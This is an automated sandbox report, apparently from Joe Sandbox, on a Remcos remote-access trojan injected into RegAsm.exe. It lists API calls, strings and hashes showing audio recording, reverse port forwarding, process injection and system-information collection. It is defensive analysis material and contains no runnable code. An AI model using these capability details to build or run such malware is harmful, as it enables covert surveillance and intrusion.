                                                                • String ID: !D@
                                                                • API String ID: 2172192267-604454484
                                                                • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 100059EA
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100059F6
                                                                • _free.LIBCMT ref: 10005A01
                                                                • _free.LIBCMT ref: 10005A0C
                                                                • _free.LIBCMT ref: 10005A17
                                                                • _free.LIBCMT ref: 10005A22
                                                                • _free.LIBCMT ref: 10005A2D
                                                                • _free.LIBCMT ref: 10005A38
                                                                • _free.LIBCMT ref: 10005A43
                                                                • _free.LIBCMT ref: 10005A51
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 004481B5
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004481C1
                                                                • _free.LIBCMT ref: 004481CC
                                                                • _free.LIBCMT ref: 004481D7
                                                                • _free.LIBCMT ref: 004481E2
                                                                • _free.LIBCMT ref: 004481ED
                                                                • _free.LIBCMT ref: 004481F8
                                                                • _free.LIBCMT ref: 00448203
                                                                • _free.LIBCMT ref: 0044820E
                                                                • _free.LIBCMT ref: 0044821C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventinet_ntoa
                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                • API String ID: 3578746661-3604713145
                                                                • Opcode ID: d74f472e9819a2ca06af66e5a0de2ffbe1272e302505ed4d741baebf2c1be1ae
                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                • Opcode Fuzzy Hash: d74f472e9819a2ca06af66e5a0de2ffbe1272e302505ed4d741baebf2c1be1ae
                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                • API String ID: 1462127192-2001430897
                                                                • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                • API String ID: 2050909247-4242073005
                                                                • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strftime.LIBCMT ref: 00401D50
                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                • API String ID: 3809562944-243156785
                                                                • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                • int.LIBCPMT ref: 00410EBC
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 3815856325-2015055088
                                                                • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                • waveInStart.WINMM ref: 00401CFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                • String ID: dMG$|MG$PG
                                                                • API String ID: 1356121797-532278878
                                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                • String ID: Remcos
                                                                • API String ID: 1970332568-165870891
                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                • __freea.LIBCMT ref: 00454083
                                                                • __freea.LIBCMT ref: 0045408F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                • String ID:
                                                                • API String ID: 201697637-0
                                                                • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 1454806937-0
                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                • _free.LIBCMT ref: 00445515
                                                                • _free.LIBCMT ref: 0044552E
                                                                • _free.LIBCMT ref: 00445560
                                                                • _free.LIBCMT ref: 00445569
                                                                • _free.LIBCMT ref: 00445575
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                • String ID: C
                                                                • API String ID: 1679612858-1037565863
                                                                • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tcp$udp
                                                                • API String ID: 0-3725065008
                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
